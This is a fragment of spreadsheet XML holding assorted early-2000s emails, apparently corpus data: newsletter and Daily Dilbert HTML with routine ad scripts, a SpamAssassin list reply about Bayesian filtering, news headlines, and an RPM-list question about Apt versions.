          &lt;tr&gt;&lt;td bgcolor="#ffffff" colspan="2" valign="top"&gt;&lt;a name="article5"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;/td&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;To change your subscribed address,
 &lt;br&gt;send both new and old address to &lt;a href="mailto:Submit@AEOpublishing.com"&gt;Submit&lt;/a&gt;
 &lt;br&gt;See the link (to the left) for our Subscription Center to unsubscribe or edit your interests.
 &lt;p&gt;Please send suggestions and comments to: &lt;a href="mailto:Editor@AEOpublishing.com"&gt;Editor&lt;/a&gt;
 &lt;br&gt;I invite you to send your real successes and showcase 
 your strategies and techniques, or yes, even your total bombs, 
 "Working Together We Can All Prosper." &lt;a href="mailto:Submit@AEOpublishing.com"&gt;Submit&lt;/a&gt;
 &lt;p&gt;For information on how to sponsor Your Membership 
 Community &amp;amp; Commentary visit: &lt;a href="http://bannersgomlm.com/ezine"&gt;Sponsorship
 Showcase&lt;/a&gt;
 &lt;p&gt;Copyright 2001 AEOpublishing.com&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
         &lt;/table&gt;
 	&lt;!-- End Article Table --&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td bgcolor="EEEEDF" valign="bottom" align="center"&gt;
 	&lt;!-- Begin Email and Site URL Links --&gt;
 	&lt;hr color="#003366" size="1" width="100%"&gt;
 	&lt;font size="1" face="Verdana,Arial,Helvetica" color="#003366"&gt;
 	&lt;b&gt;&lt;a href="mailto:"&gt;&lt;font size="1" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;/font&gt;&lt;/a&gt; :: &lt;a href="http://www.AEOpublishing.com"&gt;&lt;font size="1" color="#003366"&gt;visit our site&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 	&lt;hr color="#003366" size="1" width="100%"&gt;
     &lt;b&gt; &lt;/b&gt;
     &lt;hr color="#003366" size="1" width="100%"&gt;
 	&lt;!-- End Email and Site URL Links --&gt;
 	&lt;!--  You are required by your Constant Contact user agreement to
 	    provide the opt-out link shown below as by the property 'OptOut'. --&gt;
     &lt;font size="1" face="Verdana,Arial,Helvetica"&gt;
     This email was sent to &lt;br&gt;jm@netnoteinc.com, &lt;br&gt;at your request, &lt;br&gt;by &lt;a href="http://ccprod.roving.com/roving/sa/s.jsp?id=bd7n7877.l89m7847"&gt;Your Membership Newsletter Services&lt;/a&gt;.  
     &lt;p&gt;Visit our Subscription Center &lt;br&gt;to &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.l89m7847&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;edit&lt;/a&gt; your interests or &lt;a href="http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.l89m7847&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com"&gt;unsubscribe&lt;/a&gt;.
     &lt;p&gt;View our &lt;a href="http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp"&gt;privacy policy&lt;/a&gt;.  
     &lt;p&gt;Powered by&lt;br&gt;&lt;a href="http://www.constantcontact.com/index.jsp?cc=ccnws" target="_blank"&gt;&lt;img src="http://ccprod.roving.com/roving/images/cc-logo-color-sm.gif" border="0" alt="Constant Contact"&gt;&lt;/a&gt;
     &lt;/font&gt;
     &lt;br&gt;&lt;br&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/HTML&gt;
 --261908501.996294421526.JavaMail.RovAdmin.rovweb003--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Interesting approach to Spam handling..
</t>
  </si>
  <si>
    <t xml:space="preserve">David Hhn wrote:
 &gt; Hello, have you seen and discussed this article and his approach?
 &gt; 
 &gt; Thank you
 &gt; 
 &gt; http://www.paulgraham.com/spam.html
 Yes. See the perl module Mail::SpamTest::Bayesian on CPAN, and the 
 thread on sa-talk.
 Matt.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</si>
  <si>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West Nile virus endangers blood transfusions
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8078047,1440/
 Date: Not supplied
 US officials have all but confirmed that the virus - which has killed 84 people 
 - can be transmitted via donated blood
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Motel holds mans wheelchair ransom.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8410271,1717/
 Date: 2002-09-30T22:21:10+01:00
 [IMG: http://www.newsisfree.com/Images/fark/nandotimes.gif ([NandoTimes])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Apt 0.3 and 0.5
</t>
  </si>
  <si>
    <t xml:space="preserve">Should I expect problems if my apt server is running RH 7.3/Apt 0.3 and
 some clients are coming on line and will be running RH 8.0/Apt 0.5? Do
 the two different version interoperate?
 Thanks,
 tjb
 -- 
 =======================================================================
 | Thomas Baker                                  email: tjb@unh.edu    |
 | Systems Programmer                                                  |
 | Research Computing Center                     voice: (603) 862-4490 |
 | University of New Hampshire                     fax: (603) 862-1761 |
 | 332 Morse Hall                                                      |
 | Durham, NH 03824 USA              http://wintermute.sr.unh.edu/~tjb |
 =======================================================================
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Daily Dilbert 07/12/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">--18376580.1026469116368.JavaMail.root.umsan1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 E-mail error
 You're subscribed to the HTML version of the Daily Dilbert,
 which shows the comic strip as a graphic, but your mail system
 either can't support HTML or is set up to remove HTML content. For
 more information, contact your Internet service provider or mail
 system administrator.
 To change to a plain text subscription, modify your account
 preferences at 
 http://www.dilbert.com/comics/dilbert/daily_dilbert/html/login.html
 The plain text option appears toward the bottom of the modification
 page.
 --18376580.1026469116368.JavaMail.root.umsan1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Daily Dilbert&lt;/TITLE&gt;
 &lt;meta http-equiv=3D"pragma" content=3D"no-cache"&gt;
 &lt;META HTTP-EQUIV=3D"expires" CONTENT=3D"0"&gt;
 &lt;meta http-equiv=3D"Cache-control" content=3D"no-cache"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#336699" text=3D"#000000" link=3D"#000000" vlink=3D"#00339=
 9" alink=3D"#3333CC" MARGINWIDTH=3D"0" MARGINHEIGHT=3D"8" LEFTMARGIN=3D"0" =
 TOPMARGIN=3D"8"&gt;
 &lt;TABLE WIDTH=3D"100%" BORDER=3D"0" CELLPADDING=3D"0" BGCOLOR=3D"#336699"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR=3D"#336699" WIDTH=3D"15"&gt;&lt;IMG SRC=3D"http://www.comics.com/comi=
 cs/dilbert/images/clear_dot.gif" WIDTH=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 &lt;TD BGCOLOR=3D"#336699"&gt;
 &lt;SCRIPT LANGUAGE=3D"JAVASCRIPT"&gt;
 &lt;!--=20
 function rand(n)=20
 {
 seed =3D (0x015a4e35 * seed) % 0xfffffff;
 return (seed &gt;&gt; 16) % n;
 }
 var now =3D new Date ();
 var seed =3D now.getTime() % 0xffffffff;
 var same =3D rand(1000);
 // End hiding script from old browsers --&gt;
 &lt;/SCRIPT&gt;
 &lt;SCRIPT Language=3D"JavaScript"&gt;
 &lt;!-- hide from old browsers
   var today =3D new Date()
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE BEGIN --&gt;
 &lt;TABLE CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D"0"&gt;
 =09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09&lt;TD BGCOLOR=3D"#336699"&gt;
 =09=09=09&lt;!-- AD TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"21" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"21"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"18" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"18"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;
 =09=09=09=09=09&lt;!-- BEGIN ENHANCED CREATIVE --&gt;
 =09=09=09=09=09&lt;SCRIPT LANGUAGE=3D"JavaScript"&gt;
 =09=09=09=09=09&lt;!--
 =09=09=09=09=09document.write ('&lt;TABLE WIDTH=3D"468" CELLSPACING=3D"0" CELL=
 PADDING=3D"0" BORDER=3D"0"&gt;&lt;TR VALIGN=3D"TOP"&gt;&lt;TD ALIGN=3D"LEFT"&gt;&lt;ILAYER ID=
 =3Dph1 VISIBILITY=3Dhidden width=3D"468" height=3D"60"&gt;&lt;/ILAYER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TABLE&gt;');
 =09=09=09=09=09document.write ('&lt;NOLAYER&gt;');
 =09=09=09=09=09document.write ('&lt;IFRAME SRC=3D"http://ad.doubleclick.net/ad=
 i/dilbert.email.com/email/;sz=3D468x60;ptile=3D1;ord=3D' + same + '?" name=
 =3D"frame1" width=3D"468" height=3D"60" frameborder=3D"no" border=3D"0" MAR=
 GINWIDTH=3D"0" MARGINHEIGHT=3D"0" SCROLLING=3D"no"&gt;');
 =09=09=09=09=09document.write ('&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D5d-JN8bIK0VjRJlgtOobgZDvn5pMdRR"&gt;');
 =09=09=09=09=09document.write ('&lt;IMG SRC=3D"http://ad.doubleclick.net/ad/di=
 lbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D' + same + '?"=
  border=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/A&gt;&lt;/IFRAME&gt;');
 =09=09=09=09=09document.write ('&lt;/NOLAYER&gt;');=20
 =09=09=09=09=09//--&gt;
 =09=09=09=09=09&lt;/SCRIPT&gt;
 =09=09=09=09=09&lt;NOSCRIPT&gt;
 =09=09=09=09=09&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:=
 80/Click?q=3D88-ecGPQQKo6IEwGXp-rX3Aj6a3UsRR"&gt;&lt;IMG SRC=3D"http://ad.doublec=
 lick.net/ad/dilbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D=
 1986839?" BORDER=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/a&gt;
 =09=09=09=09=09&lt;/NOSCRIPT&gt;
 =09=09=09=09=09&lt;!-- END ENHANCED CREATIVE --&gt;&lt;/TD&gt;
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3Db2-M4LwQX093ZhwzOzjMocDBpWrLRRR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/dilbert_tshirt_120x60.gi=
 f" WIDTH=3D"120" HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Shop Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"627" HEIGHT=3D"10" COLSPAN=3D"4"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"627" HEIG=
 HT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- AD TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- HEADER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"515" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Ddc-40JzQ0L=
 X5Oh9QhxBz0gJsXRUHdRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/dai=
 ly_dilbert/images/daily_dilbert_header_left.gif" WIDTH=3D"515" HEIGHT=3D"76=
 " BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_top=
 .gif" WIDTH=3D"90" HEIGHT=3D"55" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"5" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert=
 _header_right.gif" WIDTH=3D"5" HEIGHT=3D"76" BORDER=3D"0" ALT=3D"Daily Dilb=
 ert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" ROWSPAN=3D"3"&gt;&lt;IMG SRC=3D"http://www.comics=
 .com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=3D"10" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09&lt;!-- ENTER DATE HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#003366" HEIGHT=3D"13"&gt;&lt;FONT FAC=
 E=3D"helvetica, arial" SIZE=3D"1" COLOR=3D"#FFFFFF"&gt;&lt;B&gt;07/12/2002&lt;/B&gt;&lt;/FONT=
 &gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_bot=
 tom.gif" WIDTH=3D"90" HEIGHT=3D"8" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- HEADER TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"2" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEI=
 GHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/daily_dilbert/images/white_line_right=
 .gif" WIDTH=3D"4" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"48" ROWSPAN=3D"4"&gt;&lt;IMG SRC=3D"htt=
 p://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=
 =3D"48" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"37" BGCOLOR=3D"#003366" ROWSPAN=3D=
 "2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"1" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"5" BGCOLOR=3D"#FFCC66" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"37" BACKGROUND=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/ffcc66_right.gif" ROWSPAN=3D"2"&gt;&lt;=
 IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=
 =3D"4" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10"=
  HEIGHT=3D"32" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"595" HEIGHT=3D"32" BGCOLOR=3D"#FFCC66"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;Hi Justin, enjoy your daily comic from &lt;A t=
 arget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D1b-wAd=
 hI3NAIamo9PNQ1X5Z4ZDSRRRR"&gt;Dilbert.com&lt;/A&gt;.&lt;BR&gt;&lt;B&gt;If you like the Daily Dil=
 bert, tell a friend! &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedi=
 a.com:80/Click?q=3D45-fNgJIKBR8V3DU6k-EGvB0UNgJdRR"&gt;Click here to send mail=
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"7" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"605=
 " HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"7" BACKGROUND=3D"http://www.comics=
 .com/comics/dilbert/daily_dilbert/images/ffffff_right.gif"&gt;&lt;IMG SRC=3D"http=
 ://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#003366" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"6" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"6" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"19" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/image=
 s/header_online_store.gif" WIDTH=3D"200" HEIGHT=3D"15" BORDER=3D"0" ALT=3D"=
 "&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif=
 " WIDTH=3D"4" HEIGHT=3D"4" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"9" HEIGHT=3D"83" BGCOLOR=3D"#FFFFFF" ROWSPAN=3D=
 "5"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"9" HEIGHT=3D"83" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"348" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"1" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"348" BACKGROUND=3D"http://www.comi=
 cs.com/comics/dilbert/daily_dilbert/images/white_line_right.gif" ROWSPAN=3D=
 "6"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"4" HEIGHT=3D"348" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"349" ROWSPAN=3D"7"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGH=
 T=3D"349" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"200" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/books.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Books"&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://umm=
 ail4.unitedmedia.com:80/Click?q=3D9a-b6TGQTMLGY_gwVvFiviNVl4a0RRR"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/ads/book_badge.gif" WIDTH=3D"169" =
 HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Another Day in Cubicle Paradise"&gt;&lt;/A&gt;&lt;BR&gt;=
 &lt;BR&gt;Complete your collection while pretending to work!&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dba=
 -m-95QXpzF_8-cYMxh5mplZKnWRRR"&gt;&gt; Shop&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"83" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click=
 ?q=3De4-AB7FQVkZaoE751bI8muPWXTR9dRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/com=
 ics/dilbert/daily_dilbert/images/thumb_dilbert_mints.gif" WIDTH=3D"83" HEIG=
 HT=3D"57" BORDER=3D"0" ALT=3D"Dilbert Mints"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/mints.gif" WIDTH=3D"35" HEIGHT=3D=
 "15" BORDER=3D"0" ALT=3D"Graphic (live connection required)"&gt;&lt;BR&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"120=
 " HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;They're character-shaped, in colle=
